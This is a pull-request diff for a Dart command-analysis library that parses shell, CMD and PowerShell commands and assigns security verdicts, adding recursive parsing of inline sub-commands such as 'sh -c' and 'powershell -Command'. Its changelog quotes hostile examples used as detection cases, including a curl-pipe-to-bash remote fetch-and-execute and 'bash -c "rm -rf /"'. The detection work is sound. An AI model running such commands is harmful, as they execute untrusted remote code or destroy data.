Skip to content
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
37 changes: 37 additions & 0 deletions CHANGELOG.md
Original file line number Diff line number Diff line change
@@ -1,3 +1,40 @@
## 1.1.0

### Tests

- Added parser coverage for commands that combine `|` with `&&`/`||`, asserting
the full AST structure: pipelines bind tighter than chain operators, runs of
the same chain operator flatten, and different operators nest left-to-right
(e.g. `a | b && c | d`, `a | b && c || d`, `curl … | bash && echo done`).
- Added `CommandSyntax.generic` coverage confirming operators are left
uninterpreted — `|`, `&&` and `||` survive as literal argument tokens on a
single flat invocation rather than producing `Pipeline`/`CommandChain` nodes.
- Added inline sub-command parser coverage for PowerShell and Windows CMD —
previously only POSIX `sh -c "…"` was tested. `powershell -Command "…"` and
`cmd /c|/k …` now assert the re-parsed `inlineCommand` AST (incl. inner
pipelines), `walk()` reaching nested invocations, depth bounding, the `pwsh`
alias, `/c` case-insensitivity, and that `-EncodedCommand`/`-enc` stay
un-recursed.

### Added

- Recursive analysis of inline interpreter sub-commands.

- Inline-execution sub-commands are now parsed into a nested AST and analyzed
recursively. A command string passed to an interpreter via an inline flag —
`sh -c "..."`, `bash -c '...'` (and other POSIX shells), `cmd /c ...`,
`powershell -Command "..."` — is re-parsed by the relevant parser and exposed
on the new `CommandInvocation.inlineCommand` AST field. Because it is a child
node, `walk()` descends into it, so every capability/effect/security detector
and policy sees the inner command exactly as if it were run directly.
- `sh -c "curl https://x/i.sh | bash"` now yields the same `critical → DENY`
verdict as the bare `curl https://x/i.sh | bash`.
- Catches forms the previous regex fallback missed, including single-quoted
scripts and non-remote-exec payloads (e.g. `bash -c "rm -rf /"`).
- Nesting is bounded (depth limit) to guard against pathological inputs.
- PowerShell `-EncodedCommand` is intentionally not recursed (base64, not
parseable) and remains `critical`.

## 1.0.1

Plugin-based command knowledge base.
Expand Down
17 changes: 15 additions & 2 deletions lib/src/ast/command_node.dart
Original file line number Diff line number Diff line change
Expand Up @@ -71,6 +71,7 @@ final class CommandInvocation extends CommandNode {
this.redirections = const <RedirectionNode>[],
this.substitutions = const <CommandSubstitution>[],
this.environmentReferences = const <EnvironmentVariableReference>[],
this.inlineCommand,
});

/// The program being invoked, exactly as written (not normalized).
Expand All @@ -88,6 +89,14 @@ final class CommandInvocation extends CommandNode {
/// Environment-variable references that appeared within this invocation.
final List<EnvironmentVariableReference> environmentReferences;

/// The command parsed from an inline-execution argument, if this invocation
/// runs an interpreter on a command string — e.g. the `curl ... | bash` of
/// `sh -c "curl ... | bash"`, or `cmd /c ...`, `powershell -Command ...`.
///
/// `null` for ordinary invocations. Being a child node, it is visited by
/// [walk], so the nested command is analyzed like any other command.
final CommandNode? inlineCommand;

/// All tokens of the invocation: [executable] followed by [arguments].
List<String> get tokens => <String>[executable, ...arguments];

Expand All @@ -96,6 +105,7 @@ final class CommandInvocation extends CommandNode {
...redirections,
...substitutions,
...environmentReferences,
?inlineCommand,
];

@override
Expand All @@ -105,7 +115,8 @@ final class CommandInvocation extends CommandNode {
_listEquals(other.arguments, arguments) &&
_listEquals(other.redirections, redirections) &&
_listEquals(other.substitutions, substitutions) &&
_listEquals(other.environmentReferences, environmentReferences);
_listEquals(other.environmentReferences, environmentReferences) &&
other.inlineCommand == inlineCommand;

@override
int get hashCode => Object.hash(
Expand All @@ -114,14 +125,16 @@ final class CommandInvocation extends CommandNode {
Object.hashAll(redirections),
Object.hashAll(substitutions),
Object.hashAll(environmentReferences),
inlineCommand,
);

@override
String toString() =>
'CommandInvocation($executable, args: $arguments'
'${redirections.isEmpty ? '' : ', redirs: $redirections'}'
'${substitutions.isEmpty ? '' : ', subs: $substitutions'}'
'${environmentReferences.isEmpty ? '' : ', env: $environmentReferences'})';
'${environmentReferences.isEmpty ? '' : ', env: $environmentReferences'}'
'${inlineCommand == null ? '' : ', inline: $inlineCommand'})';
}

/// A pipeline of commands connected by `|`, where each command's standard
Expand Down
99 changes: 99 additions & 0 deletions lib/src/parser/inline_exec.dart
Original file line number Diff line number Diff line change
@@ -0,0 +1,99 @@
/// Recognises interpreter invocations that run a command string supplied
/// inline as an argument — `bash -c "..."`, `sh -c '...'`, `cmd /c ...`,
/// `powershell -Command "..."` — so parsers can re-parse that string into a
/// nested AST and have it analyzed like any other command.
///
/// Shared by the shell, Windows CMD and PowerShell parsers to keep the
/// flag-recognition rules in one place.
library;

/// Base names of the POSIX-style shells whose `-c`/`--command` argument is
/// treated as an inline script.
///
/// Entries are lowercase because they are looked up with the value returned
/// by [inlineExecBasename], which lower-cases the executable name.
const _posixShells = <String>{
  'sh', 'bash', 'zsh', 'dash', 'ksh', 'fish', 'csh', 'tcsh', //
};

/// Base names of the PowerShell interpreters whose `-Command` argument is
/// treated as an inline script: Windows PowerShell (`powershell`) and
/// PowerShell Core (`pwsh`).
const _powerShells = <String>{
  'powershell',
  'pwsh',
};

/// Lowercase spellings of PowerShell's encoded-command flag.
///
/// The value that follows one of these flags is base64 rather than parseable
/// source, so such invocations are deliberately never re-parsed.
const _encodedForms = <String>{'-e', '-ec', '-enc', '-encodedcommand'};

/// Normalises [executable] to the bare, lowercase program name used for
/// interpreter lookups.
///
/// Everything up to and including the last `/` or `\` is dropped, the
/// remainder is lower-cased, and one trailing `.exe` is removed — so
/// `/usr/bin/bash` and `BASH.EXE` both become `bash`. Any other extension is
/// left in place, and a path that ends in a separator yields an empty string.
String inlineExecBasename(String executable) {
  const exeSuffix = '.exe';
  final leaf = executable.split(RegExp(r'[\\/]')).last.toLowerCase();
  return leaf.endsWith(exeSuffix)
      ? leaf.substring(0, leaf.length - exeSuffix.length)
      : leaf;
}

/// Returns the index into [arguments] of the argument holding the inline
/// command string for an [executable] invocation, or `null` when this is not
/// an inline-execution invocation (so nothing should be re-parsed).
///
/// The interpreter is identified through [inlineExecBasename], so directory
/// prefixes, letter case and a trailing `.exe` are ignored. Recognised forms:
///
/// * POSIX shells: any flag accepted by [_isPosixCommandFlag], such as `-c`,
///   `--command` or the bundled `-ec`.
/// * Windows `cmd`: `/c` or `/k`, compared case-insensitively.
/// * PowerShell (`powershell`, `pwsh`): `-Command` or any abbreviation of it
///   (`-c`, `-co`, `-com`, ...), compared case-insensitively. Other parameters
///   that merely begin with `-c`, such as `-ConfigurationName`, are skipped,
///   and the `-EncodedCommand` family is intentionally excluded because its
///   value is base64 rather than source.
///
/// Only the first matching flag is considered; `null` is returned when that
/// flag is the last argument.
int? inlineScriptArgIndex(String executable, List<String> arguments) {
  final exe = inlineExecBasename(executable);

  if (_posixShells.contains(exe)) {
    return _argAfter(arguments, _isPosixCommandFlag);
  }
  if (exe == 'cmd') {
    return _argAfter(arguments, (a) {
      final l = a.toLowerCase();
      return l == '/c' || l == '/k';
    });
  }
  if (_powerShells.contains(exe)) {
    return _argAfter(arguments, (a) {
      final l = a.toLowerCase();
      if (_encodedForms.contains(l) || l.startsWith('-encoded')) return false;
      // Accept only prefixes of `-command`. A plain `startsWith('-c')` would
      // also match `-ConfigurationName` or `-CustomPipeName`; since only the
      // first match is used, that parameter's *value* would be mistaken for
      // the script and the real `-Command` would never be reached.
      return l.length >= 2 && '-command'.startsWith(l);
    });
  }
  return null;
}

/// Matches a single-dash group of ASCII letters that includes a lowercase `c`.
///
/// Compiled once instead of on every [_isPosixCommandFlag] call.
final RegExp _shortFlagsWithC = RegExp(r'^-[A-Za-z]*c[A-Za-z]*$');

/// Whether [a] is a POSIX-shell option that introduces an inline script.
///
/// Accepts `-c`, `--command`, and any bundled short-option group containing
/// the `c` flag, wherever it sits in the group and whatever the case of the
/// neighbouring flags (`-ec`, `-xc`, `-ce`, `-Cc`, ...). bash and POSIX `sh`
/// take the command string from the next operand no matter where `c` appears
/// in the bundle, so `-ce` is as much an inline-exec flag as `-ec`.
///
/// Long options such as `--config`, a lone uppercase `-C`, and groups that
/// contain anything other than ASCII letters are rejected.
bool _isPosixCommandFlag(String a) =>
    a == '--command' || _shortFlagsWithC.hasMatch(a);

/// Locates the argument that directly follows the first entry of [arguments]
/// accepted by [isFlag].
///
/// Returns that following argument's index, or `null` when no entry matches
/// or when the first match is the final argument. Later matches are never
/// considered, even if the first one has nothing after it.
int? _argAfter(List<String> arguments, bool Function(String) isFlag) {
  final flagAt = arguments.indexWhere(isFlag);
  if (flagAt < 0) return null;
  final valueAt = flagAt + 1;
  return valueAt < arguments.length ? valueAt : null;
}
33 changes: 28 additions & 5 deletions lib/src/parser/powershell_parser.dart
Original file line number Diff line number Diff line change
@@ -1,9 +1,13 @@
import '../ast/command_node.dart';
import '../syntax.dart';
import 'command_parser.dart';
import 'inline_exec.dart';
import 'parse_diagnostic.dart';
import 'parse_result.dart';

/// The maximum interpreter-nesting depth re-parsed for inline `-Command` args.
///
/// A `_PsTokenParser` whose `depth` has reached this value no longer re-parses
/// inline scripts: `_parseInlineCommand` returns `null` instead, which bounds
/// the recursion on deeply nested input. The top-level parse starts at depth 0
/// and each re-parse adds one.
const int _maxInlineDepth = 5;

/// Parser for Microsoft PowerShell.
///
/// Recognises pipelines (`|`), statement separators (`;`), the `&&`/`||`
Expand All @@ -21,7 +25,7 @@ final class PowerShellParser extends CommandParser {
ParseResult parse(String raw) {
final diagnostics = <ParseDiagnostic>[];
final tokens = _PsTokenizer(raw, diagnostics).tokenize();
final ast = _PsTokenParser(tokens, diagnostics).parse();
final ast = _PsTokenParser(tokens, diagnostics, depth: 0).parse();
if (ast == null) {
diagnostics.add(const ParseDiagnostic.info('Empty command'));
}
Expand Down Expand Up @@ -296,18 +300,21 @@ class _PsTokenizer {
void _addSub(String inner, List<CommandSubstitution> subs) {
final innerDiag = <ParseDiagnostic>[];
final tokens = _PsTokenizer(inner, innerDiag).tokenize();
final node = _PsTokenParser(tokens, innerDiag).parse();
final node = _PsTokenParser(tokens, innerDiag, depth: 0).parse();
subs.add(
CommandSubstitution(node ?? const CommandInvocation(executable: '')),
);
}
}

class _PsTokenParser {
_PsTokenParser(this.tokens, this.diagnostics);
_PsTokenParser(this.tokens, this.diagnostics, {required this.depth});

final List<_PsToken> tokens;
final List<ParseDiagnostic> diagnostics;

/// How many interpreter `-Command` boundaries deep this parser is nested.
final int depth;
int _i = 0;

bool get _atEnd => _i >= tokens.length;
Expand Down Expand Up @@ -418,12 +425,28 @@ class _PsTokenParser {
break;
}
if (words.isEmpty) return null;
final executable = words.first.value;
final arguments = words.skip(1).map((t) => t.value).toList(growable: false);
return CommandInvocation(
executable: words.first.value,
arguments: words.skip(1).map((t) => t.value).toList(growable: false),
executable: executable,
arguments: arguments,
redirections: redirections,
substitutions: subs,
environmentReferences: envs,
inlineCommand: _parseInlineCommand(executable, arguments),
);
}

/// Builds the nested AST for an inline-exec invocation such as
/// `powershell -Command "..."`.
///
/// Returns `null` when the nesting limit ([_maxInlineDepth]) has been reached,
/// when [inlineScriptArgIndex] reports no inline script argument (which
/// includes the `-EncodedCommand` forms), or when that argument is empty.
///
/// The script is tokenised and parsed one level deeper with its own
/// diagnostics list, so problems found inside the inline script are not added
/// to [diagnostics].
///
/// NOTE(review): only the single argument at the returned index is re-parsed;
/// any words that follow it are not part of the nested AST — confirm this is
/// intended for unquoted multi-word `-Command` payloads.
CommandNode? _parseInlineCommand(String executable, List<String> arguments) {
  final scriptAt = depth < _maxInlineDepth
      ? inlineScriptArgIndex(executable, arguments)
      : null;
  final source = scriptAt == null ? '' : arguments[scriptAt];
  if (source.isEmpty) return null;

  final nestedDiagnostics = <ParseDiagnostic>[];
  return _PsTokenParser(
    _PsTokenizer(source, nestedDiagnostics).tokenize(),
    nestedDiagnostics,
    depth: depth + 1,
  ).parse();
}
}
39 changes: 34 additions & 5 deletions lib/src/parser/shell_parser.dart
Original file line number Diff line number Diff line change
@@ -1,9 +1,14 @@
import '../ast/command_node.dart';
import '../syntax.dart';
import 'command_parser.dart';
import 'inline_exec.dart';
import 'parse_diagnostic.dart';
import 'parse_result.dart';

/// The maximum interpreter-nesting depth re-parsed for inline `-c` arguments,
/// guarding against pathological inputs like `bash -c "bash -c \"...\""`.
///
/// A `_TokenParser` whose `depth` has reached this value no longer re-parses
/// inline scripts: `_parseInlineCommand` returns `null` instead. The top-level
/// parse starts at depth 0 and each re-parse adds one.
const int _maxInlineDepth = 5;

/// Shared implementation for POSIX/Bash-family shells.
///
/// Recognises pipelines (`|`), command chaining (`;`, `&&`, `||`), I/O
Expand All @@ -23,7 +28,7 @@ abstract base class ShellParser extends CommandParser {
final diagnostics = <ParseDiagnostic>[];
final tokenizer = _ShellTokenizer(raw, diagnostics);
final tokens = tokenizer.tokenize();
final parser = _TokenParser(tokens, diagnostics);
final parser = _TokenParser(tokens, diagnostics, depth: 0);
final ast = parser.parseScript();
if (ast == null) {
diagnostics.add(const ParseDiagnostic.info('Empty command'));
Expand Down Expand Up @@ -434,7 +439,7 @@ class _ShellTokenizer {
void _addSubstitution(String inner, List<CommandSubstitution> subs) {
final innerDiagnostics = <ParseDiagnostic>[];
final tokens = _ShellTokenizer(inner, innerDiagnostics).tokenize();
final node = _TokenParser(tokens, innerDiagnostics).parseScript();
final node = _TokenParser(tokens, innerDiagnostics, depth: 0).parseScript();
subs.add(
CommandSubstitution(node ?? const CommandInvocation(executable: '')),
);
Expand All @@ -444,10 +449,13 @@ class _ShellTokenizer {
// --- Recursive-descent parser over tokens --------------------------------

class _TokenParser {
_TokenParser(this.tokens, this.diagnostics);
_TokenParser(this.tokens, this.diagnostics, {required this.depth});

final List<_Token> tokens;
final List<ParseDiagnostic> diagnostics;

/// How many interpreter `-c` boundaries deep this parser is nested.
final int depth;
int _i = 0;

bool get _atEnd => _i >= tokens.length;
Expand Down Expand Up @@ -593,12 +601,33 @@ class _TokenParser {
);
}

final executable = words.first.value;
final arguments = words.skip(1).map((t) => t.value).toList(growable: false);
return CommandInvocation(
executable: words.first.value,
arguments: words.skip(1).map((t) => t.value).toList(growable: false),
executable: executable,
arguments: arguments,
redirections: redirections,
substitutions: subs,
environmentReferences: envs,
inlineCommand: _parseInlineCommand(executable, arguments),
);
}

/// Builds the nested AST for an inline-exec invocation such as
/// `sh -c "..."` or `bash -c '...'`.
///
/// Returns `null` when the nesting limit ([_maxInlineDepth]) has been reached,
/// when [inlineScriptArgIndex] reports no inline script argument, or when that
/// argument is empty.
///
/// The script is tokenised and parsed one level deeper with its own
/// diagnostics list, so problems found inside the inline script are not added
/// to [diagnostics].
CommandNode? _parseInlineCommand(String executable, List<String> arguments) {
  final scriptAt = depth < _maxInlineDepth
      ? inlineScriptArgIndex(executable, arguments)
      : null;
  final source = scriptAt == null ? '' : arguments[scriptAt];
  if (source.isEmpty) return null;

  final nestedDiagnostics = <ParseDiagnostic>[];
  final nestedTokens = _ShellTokenizer(source, nestedDiagnostics).tokenize();
  final nestedParser = _TokenParser(
    nestedTokens,
    nestedDiagnostics,
    depth: depth + 1,
  );
  return nestedParser.parseScript();
}
}
Loading